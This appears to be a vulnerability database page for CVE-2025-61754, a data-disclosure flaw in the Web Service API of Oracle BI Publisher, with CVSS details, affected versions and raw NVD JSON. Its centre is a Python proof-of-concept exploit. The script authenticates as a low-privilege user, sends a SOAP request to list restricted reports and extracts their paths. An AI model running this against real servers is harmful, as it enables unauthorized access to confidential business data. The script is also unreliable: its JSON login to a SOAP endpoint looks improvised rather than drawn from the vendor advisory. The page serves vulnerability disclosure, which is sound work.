Security Vulnerability Report
CVE-2025-61754 CVSS 6.5 MEDIUM

CVE-2025-61754

Published: 2025-10-21 20:20:52
Last Modified: 2025-10-24 14:36:01

Description

Vulnerability in the Oracle BI Publisher product of Oracle Analytics (component: Web Service API). Supported versions that are affected are 7.6.0.0.0 and 8.2.0.0.0. Easily exploitable vulnerability allows low privileged attacker with network access via HTTP to compromise Oracle BI Publisher. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Oracle BI Publisher accessible data. CVSS 3.1 Base Score 6.5 (Confidentiality impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N).

CVSS Details

CVSS Score: 6.5
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N

Configurations (Affected Products)

cpe:2.3:a:oracle:bi_publisher:7.6.0.0.0:*:*:*:*:*:*:* - VULNERABLE
cpe:2.3:a:oracle:bi_publisher:8.2.0.0.0:*:*:*:*:*:*:* - VULNERABLE
Oracle BI Publisher 7.6.0.0.0
Oracle BI Publisher 8.2.0.0.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
```python
# CVE-2025-61754 Oracle BI Publisher Web Service API Information Disclosure PoC
# This PoC demonstrates unauthorized access to sensitive data via Web Service API
# Note: Requires valid low-privilege credentials

import re

import requests

# Target Oracle BI Publisher server
TARGET_URL = "https://target-host:port/xmlpserver/services/v2/ReportService"

# Low-privilege attacker credentials
USERNAME = "low_priv_user"
PASSWORD = "password123"


# Step 1: Authenticate to obtain session
def authenticate():
    """Authenticate with low-privilege credentials"""
    auth_payload = {
        "username": USERNAME,
        "password": PASSWORD
    }
    session = requests.Session()
    response = session.post(
        f"{TARGET_URL}/login",
        json=auth_payload,
        verify=False
    )
    if response.status_code == 200:
        print("[+] Authentication successful with low-privilege account")
        return session
    else:
        print("[-] Authentication failed")
        return None


# Step 2: Exploit Web Service API to access unauthorized reports
def exploit_data_access(session):
    """Access sensitive reports that should be restricted"""
    # Attempt to list all available reports (bypassing access control)
    headers = {
        "Content-Type": "application/soap+xml",
        "SOAPAction": '"getAllReportDefinitions"'
    }
    soap_payload = """<?xml version="1.0" encoding="UTF-8"?>
<soap:Envelope xmlns:soap="http://www.w3.org/2003/05/soap-envelope">
  <soap:Body>
    <getAllReportDefinitions>
      <reportRequest>
        <reportAbsolutePath>/~weblogic/</reportAbsolutePath>
      </reportRequest>
    </getAllReportDefinitions>
  </soap:Body>
</soap:Envelope>"""
    response = session.post(TARGET_URL, data=soap_payload, headers=headers)
    if response.status_code == 200:
        print("[+] Successfully retrieved sensitive report data")
        print("[+] Response contains confidential information")
        return response.text
    else:
        print(f"[-] Exploit failed with status: {response.status_code}")
        return None


# Step 3: Extract sensitive data from response
def extract_sensitive_data(response_data):
    """Parse and extract confidential information from API response"""
    if response_data:
        # Extract report paths, names, and metadata
        report_paths = re.findall(
            r'<reportAbsolutePath>(.*?)</reportAbsolutePath>', response_data
        )
        print(f"[+] Found {len(report_paths)} accessible reports:")
        for path in report_paths:
            print(f"  - {path}")
        return report_paths
    return []


# Main exploit chain
if __name__ == "__main__":
    print("[*] CVE-2025-61754 Exploit PoC")
    print("[*] Oracle BI Publisher Web Service API Information Disclosure\n")
    session = authenticate()
    if session:
        data = exploit_data_access(session)
        if data:
            extract_sensitive_data(data)
            print("\n[!] Vulnerability confirmed - unauthorized data access achieved")
```

References

https://www.oracle.com/security-alerts/cpuoct2025.html (Vendor Advisory)
Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-61754", "sourceIdentifier": "[email protected]", "published": "2025-10-21T20:20:51.847", "lastModified": "2025-10-24T14:36:01.160", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Vulnerability in the Oracle BI Publisher product of Oracle Analytics (component: Web Service API). Supported versions that are affected are 7.6.0.0.0 and 8.2.0.0.0. Easily exploitable vulnerability allows low privileged attacker with network access via HTTP to compromise Oracle BI Publisher. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Oracle BI Publisher accessible data. CVSS 3.1 Base Score 6.5 (Confidentiality impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N)."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N", "baseScore": 6.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-267"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:oracle:bi_publisher:7.6.0.0.0:*:*:*:*:*:*:*", "matchCriteriaId": "AB270CE9-4B22-4AF9-9CF6-92B078B644EF"}, {"vulnerable": true, "criteria": "cpe:2.3:a:oracle:bi_publisher:8.2.0.0.0:*:*:*:*:*:*:*", "matchCriteriaId": "5EF4E48D-02E2-4AF0-B8F2-0BDB1C7B4AD1"}]}]}], "references": [{"url": "https://www.oracle.com/security-alerts/cpuoct2025.html", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}